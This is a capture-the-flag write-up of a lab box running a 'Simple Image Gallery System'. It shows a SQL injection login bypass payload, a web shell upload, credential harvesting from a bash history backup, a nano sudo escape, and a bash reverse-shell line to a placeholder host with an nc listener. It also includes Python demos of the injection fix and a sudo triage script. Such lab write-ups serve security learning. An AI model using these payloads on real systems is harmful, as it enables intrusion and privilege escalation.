First I ran a port scan (nmap) and found two open ports, 80 and 8080:
# Nmap 7.92 scan initiated Sat Feb 12 22:32:01 2022 as: nmap -A -oN nmap-scan 10.10.112.90
Nmap scan report for 10.10.112.90
Host is up (0.36s latency).
Not shown: 998 closed tcp ports (conn-refused)
PORT STATE SERVICE VERSION
80/tcp open http Apache httpd 2.4.29 ((Ubuntu))
|_http-server-header: Apache/2.4.29 (Ubuntu)
|_http-title: Apache2 Ubuntu Default Page: It works
8080/tcp open http Apache httpd 2.4.29 ((Ubuntu))
|_http-server-header: Apache/2.4.29 (Ubuntu)
| http-open-proxy: Potentially OPEN proxy.
|_Methods supported:CONNECTION
|_http-title: Simple Image Gallery System
| http-cookie-flags:
| /:
| PHPSESSID:
|_ httponly flag not set
Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
# Nmap done at Sat Feb 12 22:33:06 2022 -- 1 IP address (1 host up) scanned in 65.51 seconds
Opening port 80 in the browser just gave the default Apache page.
Then I opened the other port, 8080, which nmap had flagged as a possible open proxy; it redirected me to https://ip/gallery/, which has a login page.
Initial Access & Foothold
On the login page I tried SQL injection with the payload admin ' or 1=1 limit 1-- +' as the username, and was able to log in as administrator.
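To make the bypass concrete, here is an added example (my code, not the Simple Image Gallery System's) that rebuilds the login check over an in-memory SQLite table with constructed users. The query shape and the md5 password hashing are assumptions about the PHP application; the payload is the one used above. The parameterised version alongside it shows the fix.

```python
import hashlib
import sqlite3

# Constructed sample users; these are not the real Gallery credentials.
SAMPLE_USERS = [
    ("admin", hashlib.md5(b"password").hexdigest()),
    ("mike", hashlib.md5(b"m1k3").hexdigest()),
]

# The payload from the write-up, sent in the username field.
PAYLOAD = "admin ' or 1=1 limit 1-- +'"


def make_db():
    con = sqlite3.connect(":memory:")
    con.execute("CREATE TABLE users (id INTEGER PRIMARY KEY, username TEXT, password TEXT)")
    con.executemany("INSERT INTO users (username, password) VALUES (?, ?)", SAMPLE_USERS)
    return con


def injected_query(username, pw_hash="<hash>"):
    """The SQL the vulnerable login builds by string concatenation (assumed shape)."""
    return (f"SELECT username FROM users WHERE username = '{username}' "
            f"AND password = '{pw_hash}'")


def vulnerable_login(con, username, password):
    """Concatenates user input into the query: the quote closes the string literal,
    'or 1=1 limit 1' selects the first row (admin), and '-- ' comments out the
    password check that follows."""
    pw_hash = hashlib.md5(password.encode()).hexdigest()
    row = con.execute(injected_query(username, pw_hash)).fetchone()
    return row[0] if row else None


def safe_login(con, username, password):
    """Same check with bound parameters: the payload is compared as a literal username."""
    pw_hash = hashlib.md5(password.encode()).hexdigest()
    row = con.execute(
        "SELECT username FROM users WHERE username = ? AND password = ?",
        (username, pw_hash),
    ).fetchone()
    return row[0] if row else None


if __name__ == "__main__":
    con = make_db()
    print(injected_query(PAYLOAD))
    print("vulnerable login:", vulnerable_login(con, PAYLOAD, "anything"))
    print("parameterised login:", safe_login(con, PAYLOAD, "anything"))
```

Printing injected_query(PAYLOAD) shows why the trailing password clause no longer matters: everything after the -- is a comment, so only the username clause is evaluated and LIMIT 1 returns the first user in the table.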
Looking around the dashboard I found an upload field under the profile settings, so I uploaded a file, captured the request, and edited the file contents into a simple web shell.
From the web shell I was able to get the MySQL credentials, plus a $dev_data entry that looks like the developer's credentials. The admin username and password hash are stored in the database, so I answered question three by logging in to MySQL and copying the admin hash.
The first thing I did after that was upgrade the shell to a proper TTY so it would stop giving those shell errors.
With the shell upgraded, I went through /var/backups and found a backup of the user mike's home directory. His .bash_history contains a password typed on the command line by mistake (the mistyped sudo line), and that password worked for su:
www-data@gallery:/var/backups/mike_home_backup$ cat .bash_history
cat .bash_history
cd ~
ls
ping 1.1.1.1
cat /home/mike/user.txt
cd /var/www/
ls
cd html
ls -al
cat index.html
sudo -lb[REDACTED]x
clear
sudo -l
exit
User.txt
www-data@gallery:/var/backups/mike_home_backup$ su mike
Password:
mike@gallery:/var/backups/mike_home_backup$ cd ~
mike@gallery:~$ ls
documents images user.txt
mike@gallery:~$ cat user.txt
THM{af05[REDACTED]46ef}
Privilege Escalation
I first ran sudo -l to see which commands mike can run as root:
mike@gallery:~$ sudo -l
Matching Defaults entries for mike on gallery:
env_reset, mail_badpass,
secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin\:/snap/bin
User mike may run the following commands on gallery:
(root) NOPASSWD: /bin/bash /opt/rootkit.sh
I read the file /opt/rootkit.sh
#!/bin/bash
read -e -p "Would you like to versioncheck, update, list or read the report ? " ans;
# Execute your choice
case $ans in
versioncheck)
/usr/bin/rkhunter --versioncheck ;;
update)
/usr/bin/rkhunter --update;;
list)
/usr/bin/rkhunter --list;;
read)
/bin/nano /root/report.txt;;
*)
exit;;
esac
After looking at the contents of rootkit.sh, we have four choices: versioncheck, update, list and read. The last one is the interesting one, because choosing it runs nano as root, and nano can spawn a shell. Time for a quick look at GTFOBins.
^R^X [control+R + control+X]
reset; sh 1>&0 2>&0
and from the resulting root shell I can type
/bin/bash -c "bash -i &>/dev/tcp/tunip/port <&1"
Set up a listener on your terminal first, and boom, we have a root shell:
[tahaafarooq@urchinsec-lab gallery]$ nc -lvnp 1122
Connection from 10.10.170.61:54522
root@gallery:~# id
id
uid=0(root) gid=0(root) groups=0(root)
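As an added example (not part of the write-up), the following Python script automates the check done above: it parses sudo -l output for rules, and when a rule runs a script through an interpreter it reads that script and reports any binary known to offer a shell escape when run as root. The sudo output and rootkit.sh below are copied from the write-up as constructed sample input, and the list of escape-capable binaries is a partial, assumed list based on GTFOBins.

```python
import os
import re

# Constructed sample input: the sudo -l output and /opt/rootkit.sh from the write-up.
SUDO_L_OUTPUT = r"""Matching Defaults entries for mike on gallery:
    env_reset, mail_badpass,
    secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin\:/snap/bin
User mike may run the following commands on gallery:
    (root) NOPASSWD: /bin/bash /opt/rootkit.sh
"""

ROOTKIT_SH = r"""#!/bin/bash
read -e -p "Would you like to versioncheck, update, list or read the report ? " ans;
case $ans in
  versioncheck) /usr/bin/rkhunter --versioncheck ;;
  update)       /usr/bin/rkhunter --update;;
  list)         /usr/bin/rkhunter --list;;
  read)         /bin/nano /root/report.txt;;
  *)            exit;;
esac
"""

# Partial, assumed list (based on GTFOBins) of binaries that can spawn a shell
# when run as root, e.g. nano's ^R^X read-file/execute-command escape.
SHELL_ESCAPE_BINARIES = {"nano", "vim", "vi", "less", "more", "man", "awk",
                         "find", "python", "python3", "perl", "ed"}

# Interpreters whose first argument is a script worth reading.
SCRIPT_RUNNERS = {"bash", "sh", "dash", "python", "python3", "perl"}

# A sudo rule line looks like "(runas) TAG: TAG: command args".
RULE_RE = re.compile(r"^\s*\((?P<runas>[^)]+)\)\s+(?P<tags>(?:[A-Z]+:\s*)*)(?P<cmd>\S.*)$")


def parse_sudo_l(output):
    """Return (runas, nopasswd, command) for each rule line in `sudo -l` output."""
    rules = []
    for line in output.splitlines():
        m = RULE_RE.match(line)
        if m:
            rules.append((m["runas"].strip(), "NOPASSWD:" in m["tags"], m["cmd"].strip()))
    return rules


def find_shell_escapes(script_text):
    """Absolute paths in the script whose basename is an escape-capable binary."""
    found = []
    for path in re.findall(r"/[\w./+-]+", script_text):
        if os.path.basename(path) in SHELL_ESCAPE_BINARIES and path not in found:
            found.append(path)
    return found


def triage(sudo_output, read_file):
    """Cross-check each sudo rule against the binary it runs and the script it executes.

    `read_file` maps a path to its contents so the example runs offline; on a target
    you would pass something like `lambda p: open(p).read()`.
    """
    findings = []
    for runas, nopasswd, cmd in parse_sudo_l(sudo_output):
        argv = cmd.split()
        script = argv[1] if len(argv) > 1 and os.path.basename(argv[0]) in SCRIPT_RUNNERS else None
        escapes = []
        if script is not None:
            try:
                escapes = find_shell_escapes(read_file(script))
            except (OSError, KeyError):
                pass  # script unreadable from our user; still report the rule
        if os.path.basename(argv[0]) in SHELL_ESCAPE_BINARIES:
            escapes.insert(0, argv[0])  # direct rule such as "(root) NOPASSWD: /bin/nano"
        findings.append({"runas": runas, "nopasswd": nopasswd, "command": cmd,
                         "script": script, "escapes": escapes})
    return findings


if __name__ == "__main__":
    for f in triage(SUDO_L_OUTPUT, {"/opt/rootkit.sh": ROOTKIT_SH}.__getitem__):
        print(f)
```

Run on the Gallery rules, the one finding is the rootkit.sh rule with /bin/nano listed under escapes, which is exactly the path taken above; the same parser also flags a direct rule like (root) /usr/bin/vim, which needs no script at all.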